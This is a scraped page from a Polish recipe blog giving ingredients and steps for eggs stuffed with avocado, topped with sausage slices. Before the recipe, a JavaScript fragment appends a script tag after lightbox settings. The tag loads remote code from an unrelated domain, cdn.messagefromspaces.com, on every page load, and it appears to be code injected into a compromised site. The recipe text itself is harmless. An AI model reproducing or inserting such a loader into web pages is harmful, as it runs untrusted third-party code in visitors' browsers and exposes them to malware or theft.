, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Jajo faszerowane z avocado i parówką na zachętę:)

Wydrukuj artykuł Wydrukuj artykuł

jajo faszerowane z avocado

Kolacja przyjęta została z ogromnym entuzjazmem! W końcu pojawiło się ulubione jajo!  przy okazji do brzuszka wpadło… avocado,  miałam zamiar dodać jeszcze koperek, ale powstrzymałam się, uznałam, że to zbyt „ryzykowne”:)

Składniki:

  • 3 jajka ugotowane na twardo
  • 1 miękkie, dojrzałe avocado
  • 2 łyżki soku z cytryny
  • odrobina czosnku granulowanego
  • odrobina soli
  • łyżka majonezu (można zastąpić mielonym twarożkiem)
  • kilka plasterków parówki – do ozdobienia (można zastąpić żółtym serem)

Ugotowane jajka obrać i przekroić wzdłuż na pół. Avocado obrać pokroić na kawałki i skropić sokiem z cytryny – aby nie ściemniało. Do miski włożyć 3 żółtka z ugotowanych jajek, avocado i pozostałe składniki – dokładnie rozgnieść widelcem, wymieszać do uzyskania gładkiej konsystencji (można użyć blendera). Nafaszerować jajka. Ja do tego celu używam czystego woreczka „śniadaniowego”. Po napełnieniu nacinam rożek i wyciskam jak ze szprycy.

Farszu Wam zostanie – można posmarować nim chlebek i… zjeść:)

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony